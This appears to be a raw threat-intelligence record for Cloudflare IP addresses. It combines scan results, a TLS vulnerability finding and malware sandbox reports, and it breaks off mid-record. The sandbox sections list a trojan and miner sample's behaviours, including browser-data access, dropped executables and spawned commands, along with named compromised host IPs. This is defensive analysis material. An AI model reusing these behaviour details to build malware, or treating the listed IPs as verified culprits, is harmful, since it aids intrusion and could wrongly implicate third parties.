{"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=w35ltoLfxmzU%2BLV0Iye9ADkcnmaLFoVg14AsLDdaYVQbu7Qcj9ZVhQ%2BUkPijYfYXTatno9IkxZkM2oOlyTVpqqS%2F5h%2BXEfPuLVAux5gwez0%2FN5SFcQ%2Frxox04ZtqWXjOBYY%3D"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 76469a0b9adf9b2b-FRA\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\nPage title: Most viewed', u'time': u'2022-11-03T16:49:10.866369244Z'}, {u'protocol': u'https', u'event_type': u'service', u'ip': u'104.21.7.179', u'vendor': u'', u'port': u'443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'104.16.0.0/13'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731b5c07e2a0605f5df67b41e33f0c8df39b84175dbd6f0a150', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'MARCZ', u'url': u'', u'header': {u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'TLS_AES_128_GCM_SHA256', u'jarm': u'00000000000000000000000000000000000000000000000000000000000000', u'certificate': {u'domain': [u'*.marcz.com.mx', u'marcz.com.mx'], u'cn': u'*.marcz.com.mx', u'valid': True, u'not_after': u'2023-02-01T04:37:32Z', u'key_size': 2048, u'issuer_name': u'GTS CA 1P5', u'fingerprint': u'97cd9112488edfdbb7f554f8d890ab236c4f8f3c5e808dbc41f13a1fe5ff7608', u'key_algo': u'RSA', u'not_before': u'2022-11-03T04:37:33Z'}, u'enabled': True, 
u'detected': False, u'version': u'TLSv1.3'}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'', u'country_iso_code': u'', u'city_name': u'', u'location': {u'lat': 0, u'lon': 0}, u'country_name': u'', u'continent_name': u'', u'region_name': u''}, u'host': u'marcz.com.mx', u'summary': u'Date: Thu, 03 Nov 2022 05:39:27 GMT\r\nContent-Type: text/html; charset=utf-8\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nSet-Cookie: PHPSESSID=nfmq3diji9aonqg43vvffqu9ir; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate\r\nPragma: no-cache\r\nX-Site-Id: 5a4513c5ff7b5bbaf5ca0c3ad06b4d5df99f78975c669a9bf5b4cdc05b2f5348646fa0f7\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=wXDmH9082163r28PZeFy9gRTW2AyL4ZcMyNktkZu0bQxzverweXV18f2vYnQOOlmJFhAv5HIOIv%2F2K5ZC6QVRXT%2FFJw23JnqX2ibiOuDGL47D2cY7FP9LO76Q9Z8cE8%3D"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 7642c4fe2921dd71-LHR\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\nPage title: MARCZ', u'time': u'2022-11-03T05:39:26.397484659Z'}, {u'protocol': u'https', u'event_type': u'service', u'ip': u'104.21.7.179', u'vendor': u'', u'port': u'443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'104.16.0.0/13'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731fedbc44a39cb147fd61faf139899b9328d20ff915a7cd725', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, 
u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'Best Ardooie Belgium gay dating site', u'url': u'', u'header': {u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'TLS_AES_128_GCM_SHA256', u'jarm': u'00000000000000000000000000000000000000000000000000000000000000', u'certificate': {u'domain': [u'drawasbasmamis.ml', u'sni.cloudflaressl.com', u'*.drawasbasmamis.ml'], u'cn': u'sni.cloudflaressl.com', u'valid': True, u'not_after': u'2023-09-04T23:59:59Z', u'key_size': 256, u'issuer_name': u'Cloudflare Inc ECC CA-3', u'fingerprint': u'1b4fde192766931f3a23145b88a1f9838dfdc810fe500c0d2122b62f4d75660f', u'key_algo': u'ECDSA', u'not_before': u'2022-09-04T00:00:00Z'}, u'enabled': True, u'detected': False, u'version': u'TLSv1.3'}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'', u'country_iso_code': u'', u'city_name': u'', u'location': {u'lat': 0, u'lon': 0}, u'country_name': u'', u'continent_name': u'', u'region_name': u''}, u'host': u'drawasbasmamis.ml', u'summary': u'Date: Wed, 02 Nov 2022 07:40:10 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nSet-Cookie: ch1c=b\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=U7V%2B5YAFbuATxcyWS%2Bu7ZtCsGQJMrgtC7HcQmAYwqqNFyee7UkdeSw0Y4i5TqMIed2%2FDbJhYWWjJr78BFFlXMp%2BU%2BBOJ11HPWXMVeXWA5oK9iZmqVEALUK4YVT8sHxdEN0Fq5Q%3D%3D"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","m 104.21.7.179 2022-12-18 00:14:36 Vulnerability - CVE Low Yes Tool - testssl.sh 0 1 2 0 None CVE-2013-0169 https://nvd.nist.gov/vuln/detail/CVE-2013-0169 Score: 2.6 Description: The TLS protocol 1.1 and 1.2 and the DTLS 
protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. Per http://www.openssl.org/news/vulnerabilities.html: Fixed in OpenSSL 1.0.1d (Affected 1.0.1c, 1.0.1b, 1.0.1a, 1.0.1) Fixed in OpenSSL 1.0.0k (Affected 1.0.0j, 1.0.0i, 1.0.0g, 1.0.0f, 1.0.0e, 1.0.0d, 1.0.0c, 1.0.0b, 1.0.0a, 1.0.0) Fixed in OpenSSL 0.9.8y (Affected 0.9.8x, 0.9.8w, 0.9.8v, 0.9.8u, 0.9.8t, 0.9.8s, 0.9.8r, 0.9.8q, 0.9.8p, 0.9.8o, 0.9.8n, 0.9.8m, 0.9.8l, 0.9.8k, 0.9.8j, 0.9.8i, 0.9.8h, 0.9.8g, 0.9.8f, 0.9.8d, 0.9.8c, 0.9.8b, 0.9.8a, 0.9.8) Affected users should upgrade to OpenSSL 1.0.1e, 1.0.0k or 0.9.8y (The fix in 1.0.1d wasn't complete, so please use 1.0.1e or later) 188.114.96.9 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None d68f9904-2e3d-4090-854b-ff8a0a1bfcdf.id.repl.co 34.149.204.188 2022-12-18 00:07:04 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None {u'count': 4, u'search_terms': [{u'id': u'host', u'value': u'81.88.52.232'}], u'result': [{u'environment_id': 100, u'job_id': u'62da0341155b644cbf25ee8a', u'analysis_start_time': u'2022-07-22 01:54:10', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'ed869700692422a45f2148051ae0facf769fa849fedd48e2677d9309eb7887dd', u'type': None, u'type_short': u'url', u'size': 61}, {u'environment_id': 100, u'job_id': u'6269600634b274176c687406', u'analysis_start_time': u'2022-04-27 15:23:54', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': 70, u'verdict': u'suspicious', u'submit_name': u'sample.url', 
u'sha256': u'cbc559c051211a3c2705c3c596c72bd474794b641af2edb475537f28daaa3a9d', u'type': None, u'type_short': u'url', u'size': 44}, {u'environment_id': 100, u'job_id': u'6244827f3100683457311fa8', u'analysis_start_time': u'2022-03-30 16:17:10', u'vx_family': u'Malware site', u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': 77, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'e7b7b6a0a4b989cb9835d10b4d7ab47c93a8163a9fbeed5a7db9d0568942f99a', u'type': None, u'type_short': u'url', u'size': 50}, {u'environment_id': 120, u'job_id': u'62053dddc78deb50351e9b07', u'analysis_start_time': u'2022-02-10 16:31:30', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 64 bit', u'threat_score': 77, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'56a636800d3684f91fbe334333b8bff47eb09fd955e1eb29dd558368145e934a', u'type': None, u'type_short': u'url', u'size': 49}]} 81.88.52.232 2022-12-18 00:12:19 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 15, u'threat_score': 35, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'http://188.114.96.3/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"188.114.96.3:80"\n "104.18.30.78:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "Part-RU" as clean (type is "DOS 
executable (COM)")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7844:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "Local\\SM0:5972:304:WilStaging_02"\n "Local\\InternetShortcutMutex"\n "Local\\SM0:5972:120:WilError_01"\n "Local\\SM0:7844:304:WilStaging_02"\n "Local\\SM0:7844:120:WilError_01"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7844:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7704:304:WilStaging_02"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-33', u'name': u'Drops executable files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\7844_1747259734\\Part-RU]- [targetUID: 00000000-00007844]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\000003.log]- [targetUID: 00000000-00007844]\n "Part-ES" has type "data"- Location: [%TEMP%\\7844_1747259734\\Part-ES]- [targetUID: 00000000-00007844]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 
00000000-00007844]\n "1a8f52a0-4099-4402-b391-421fc08473ee.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\1a8f52a0-4099-4402-b391-421fc08473ee.tmp]- [targetUID: 00000000-00006860]\n "4e33750c-68a3-4112-95eb-4d1abbad7b2e.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\4e33750c-68a3-4112-95eb-4d1abbad7b2e.tmp]- [targetUID: 00000000-00007844]\n "3ea8b6c1-ec31-4428-9eac-f50edddf6fec.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\3ea8b6c1-ec31-4428-9eac-f50edddf6fec.tmp]- [targetUID: 00000000-00007844]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00007660]\n "manifest.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\OriginTrials\\0.0.1.4\\manifest.json]- [targetUID: 00000000-00007844]\n "a3302238-aeb2-4870-bfa5-e04961c56c63.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\a3302238-aeb2-4870-bfa5-e04961c56c63.tmp]- [targetUID: 00000000-00007844]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00007844]\n "cffaa58e-e034-4193-ac55-7175f0cedd28.tmp" has type "very short file (no magic)"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\cffaa58e-e034-4193-ac55-7175f0cedd28.tmp]- [targetUID: 00000000-00007844]\n "870b1947-b37b-41dc-a12d-92436625da90.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\870b1947-b37b-41dc-a12d-92436625da90.tmp]- [targetUID: 00000000-00007844]\n "temp-index" has type "data"- 
Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\index-dir\\temp-index]- [targetUID: 00000000-00007844]\n "shopping_iframe_driver.js" has type "ASCII text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7844_1603751462\\shopping_iframe_driver.js]- [targetUID: 00000000-00007844]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\OriginTrials\\0.0.1.4\\manifest.fingerprint]- [targetUID: 00000000-00007844]\n "7f7f3eea-ccb8-495f-8e9f-46a493f00f9b.tmp" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Ad Blocking\\7f7f3eea-ccb8-495f-8e9f-46a493f00f9b.tmp]- [targetUID: 00000000-00007844]\n "LOG" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Service Worker\\Database\\LOG]- [targetUID: 00000000-00007844]\n "Part-FR" has type "data"- Location: [%TEMP%\\7844_1747259734\\Part-FR]- [targetUID: 00000000-00007844]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://188.114.96.3/"\n Pattern match: "http://188.114.96.3"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-35', u'name': u'Drops script files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 1, u'type': 8, u'description': u'Dropped file: "shopping_iframe_driver.js" - Location: [%TEMP%\\7844_1603751462\\shopping_iframe_driver.js]- [targetUID: 00000000-00007844]\n Dropped file: "shopping.js" - Location: [%TEMP%\\7844_1603751462\\shopping.js]- [targetUID: 00000000-00007844]\n Dropped file: 
"edge_confirmation_page_validator.js" - Location: [%TEMP%\\7844_1603751462\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00007844]\n Dropped file: "edge_checkout_page_validator.js" - Location: [%TEMP%\\7844_1603751462\\edge_checkout_page_validator.js]- [targetUID: 00000000-00007844]\n Dropped file: "adblock_snippet.js" - Location: [%TEMP%\\7844_1747259734\\adblock_snippet.js]- [targetUID: 00000000-00007844]\n Dropped file: "shoppingfre.js" - Location: [%TEMP%\\7844_1603751462\\shoppingfre.js]- [targetUID: 00000000-00007844]\n Dropped file: "edge_tracking_page_validator.js" - Location: [%TEMP%\\7844_1603751462\\edge_tracking_page_validator.js]- [targetUID: 00000000-00007844]\n Dropped file: "product_page.js" - Location: [%TEMP%\\7844_1603751462\\product_page.js]- [targetUID: 00000000-00007844]\n Dropped file: "edge_driver.js" - Location: [%TEMP%\\7844_1603751462\\edge_driver.js]- [targetUID: 00000000-00007844]\n Dropped file: "auto_open_controller.js" - Location: [%TEMP%\\7844_1603751462\\auto_open_controller.js]- [targetUID: 00000000-00007844]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-1', u'name': u'Drops executable files', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 8, u'description': u'"Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\7844_1747259734\\Part-RU]- [targetUID: 00000000-00007844]'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'String', u'identifier': u'string-93', u'name': u'Found browser information locations related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1005', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1005', u'relevance': 5, u'threat_level': 1, u'type': 2, u'description': u'"C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Crashpad\\reports" (Indicator: "microsoft\\edge\\user 
data") in Source: 00000000-00007844-00000BE4-912947994\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\OptimizationGuidePredictionModels" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00007844-00000BE4-11179608308\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\EdgePushStorageWithConnectTokens" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00007844-00000BE4-11670863117\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\blob_storage\\194cca25-e317-474b-be1e-a7c27f1695b6" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00007844-00000BE4-26668708152\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\blob_storage\\d0313995-11ad-4fbc-ac47-fb134ed2e3e0" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00007844-00000BE6-26681438356\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\scoped_dir7844_1486529118" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00007844-00000BE4-326216024507\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.28\\LICENSE" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00007844-00000 188.114.96.3 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None new.friendsquito.repl.co 34.149.204.188 2022-12-18 00:08:38 BGP AS Membership No RIPE 0 0 3 0 None 13335 172.67.144.0/20 2022-12-18 00:16:27 SSL Certificate - Raw Data No SSL Certificate Analyzer 0 0 2 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 09:6b:82:e9:73:99:94:ba:fd:55:b0:21:db:c7:c8:bf Signature Algorithm: ecdsa-with-SHA256 Issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 Validity Not Before: Aug 3 00:00:00 2022 GMT Not After : Aug 2 23:59:59 2023 GMT Subject: C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com Subject Public Key 
Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:76:16:8f:f9:e3:b6:aa:dc:0b:91:40:d8:f1:ee: e8:7f:8e:97:0e:7d:bd:b0:c5:93:63:66:fa:7b:4f: 17:a1:09:ff:20:68:33:a3:45:37:1f:e8:4b:eb:77: 53:b6:57:60:ef:a1:af:f1:36:97:26:c7:fa:95:e9: 9a:ab:1a:dd:7d ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Authority Key Identifier: keyid:A5:CE:37:EA:EB:B0:75:0E:94:67:88:B4:45:FA:D9:24:10:87:96:1F X509v3 Subject Key Identifier: 18:B9:52:2C:13:17:3E:3A:39:88:53:5C:BD:9C:BE:05:0B:02:25:90 X509v3 Subject Alternative Name: DNS:cdnjs.cloudflare.com, DNS:*.cdnjs.cloudflare.com, DNS:sni.cloudflaressl.com X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 CRL Distribution Points: Full Name: URI:http://crl3.digicert.com/CloudflareIncECCCA-3.crl Full Name: URI:http://crl4.digicert.com/CloudflareIncECCCA-3.crl X509v3 Certificate Policies: Policy: 2.23.140.1.2.2 CPS: http://www.digicert.com/CPS Authority Information Access: OCSP - URI:http://ocsp.digicert.com CA Issuers - URI:http://cacerts.digicert.com/CloudflareIncECCCA-3.crt X509v3 Basic Constraints: critical CA:FALSE CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9: 03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E Timestamp : Aug 3 19:12:00.178 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:44:02:20:35:9E:7D:1C:03:B8:4A:87:C0:13:01:D5: 28:AD:64:70:5B:10:FC:72:88:58:48:7A:E3:4C:D5:27: DB:76:00:22:02:20:12:E0:E2:34:44:22:24:C1:E5:7A: 25:12:AD:9E:F8:88:A1:A0:65:AF:1A:76:C9:03:41:4F: 8A:70:C8:E6:BA:DA Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 35:CF:19:1B:BF:B1:6C:57:BF:0F:AD:4C:6D:42:CB:BB: B6:27:20:26:51:EA:3F:E1:2A:EF:A8:03:C3:3B:D6:4C Timestamp : Aug 3 19:12:00.017 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:EE:6E:D3:CF:4A:8A:13:16:AB:6B:C2: 
F7:32:B6:2A:5B:13:45:7A:44:ED:3B:86:8B:85:F4:94: BA:E0:8C:12:60:02:21:00:8C:46:CA:E7:C6:A7:69:C8: 22:62:61:BA:E1:29:8F:BC:3C:BF:F4:A2:81:44:80:DA: F5:C9:B6:E6:AF:CD:A6:FB Signed Certificate Timestamp: Version : v1 (0x0) Log ID : B3:73:77:07:E1:84:50:F8:63:86:D6:05:A9:DC:11:09: 4A:79:2D:B1:67:0C:0B:87:DC:F0:03:0E:79:36:A5:9A Timestamp : Aug 3 19:12:00.038 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:E5:0C:F6:4E:3C:40:01:1A:EC:D8:91: 2D:69:6A:1C:FF:4F:75:55:8C:D7:D2:38:86:36:36:FA: EE:4F:65:29:FC:02:21:00:9F:BC:3F:8A:93:C7:A2:ED: F5:94:99:85:01:90:F2:60:36:3B:2E:03:0E:E0:46:5E: 8C:3E:16:39:2B:64:D1:78 Signature Algorithm: ecdsa-with-SHA256 30:45:02:21:00:d8:35:e0:5c:fe:c9:39:b4:06:5a:95:36:1c: 73:f4:85:1c:c5:6e:6b:ef:48:76:d6:7f:a3:fe:55:ed:82:7f: c5:02:20:7f:8c:86:3a:6f:04:3e:0d:d7:cc:87:51:a8:0d:5c: ce:bc:93:88:aa:35:4a:5c:02:bb:47:5c:7c:87:7b:21:de 188.114.97.3 2022-12-18 00:19:16 Raw Data from RIRs No Hybrid Analysis 0 0 3 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 0, u'threat_score': None, u'compromised_hosts': [], u'environment_id': None, u'major_os_version': None, u'submit_name': u'file', u'signatures': [], u'threat_level': 2, u'size': 12074496, u'job_id': None, u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [], u'certificates': [], u'hosts': [], u'sha256': u'4623e1ce31a8671e59640e83fc545a5f19e167c31cfc6e8d097864c7a4c27859', u'sha512': u'2f6b245abefc8a6be75c163474f1b0d088382776fcc5db174c088a377aa956d93a701ccefcf7223936350989a4f3b589e1a49d0eca5fb6eac76001c116f9fa10', u'image_file_characteristics': [], u'submissions': [{u'url': None, u'submission_id': u'60acfbefb300bf7e665fadf4', u'created_at': u'2021-05-25T13:30:23+00:00', u'filename': u'file'}], u'analysis_start_time': u'2021-05-25T13:30:23+00:00', u'tags': [], u'imphash': None, u'total_network_connections': 0, u'av_detect': 87, 
u'machine_learning_models': [], u'total_signatures': 0, u'image_base': None, u'error_origin': None, u'ssdeep': None, u'entrypoint_section': None, u'md5': u'190ae55de09b24c97c55def9ae4d1122', u'network_mode': u'default', u'processes': [], u'sha1': u'f66c17bc3bed94dd163114c84d855e11a8b97a6a', u'url_analysis': False, u'type': u'PE32 executable (GUI) Intel 80386, for MS Windows', u'file_metadata': None, u'dll_characteristics': [], u'vx_family': u'Trojan.Mint.Zamg', u'environment_description': u'Static Analysis', u'verdict': u'malicious', u'minor_os_version': None, u'domains': [], u'extracted_files': [], u'type_short': [u'peexe', u'executable']}, {u'subsystem': None, u'classification_tags': [u'miner'], u'crowdstrike_ai': None, u'total_processes': 10, u'threat_score': 100, u'compromised_hosts': [u'43.231.4.7', u'94.23.27.38', u'69.168.106.65', u'213.33.98.149', u'185.65.202.47', u'209.85.200.27', u'144.160.159.22', u'72.167.238.29', u'170.146.221.13', u'74.208.5.20', u'184.171.128.11', u'69.168.106.33', u'68.87.20.5', u'207.69.189.231', u'98.137.157.43', u'208.180.40.132', u'65.20.0.49'], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'4623e1ce31a8671e59640e83fc545a5f19e167c31cfc6e8d097864c7a4c27859.exe', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-4', u'name': u'Creates a writable file in a temporary directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'".exe" created file "%TEMP%\\auwtnjty.exe"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n 
"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\RasPbFile"\n "\\Sessions\\1\\BaseNamedObjects\\Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7"'}, {u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-17', u'name': u'Accesses System Certificates Settings', u'attck_id_wiki': u'https://attack.mitre.org/wiki/Technique/T1112', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1112', u'relevance': 10, u'threat_level': 0, u'type': 3, u'description': u'"svchost.exe" (Path: "HKU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\MY"; Key: "")'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-25', u'name': u'Spawns new processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "cmd.exe" with commandline "/C mkdir %WINDIR%\\SysWOW64\\ogiqgahj\\" (UID: 00021650-00002144)\n Spawned process "cmd.exe" with 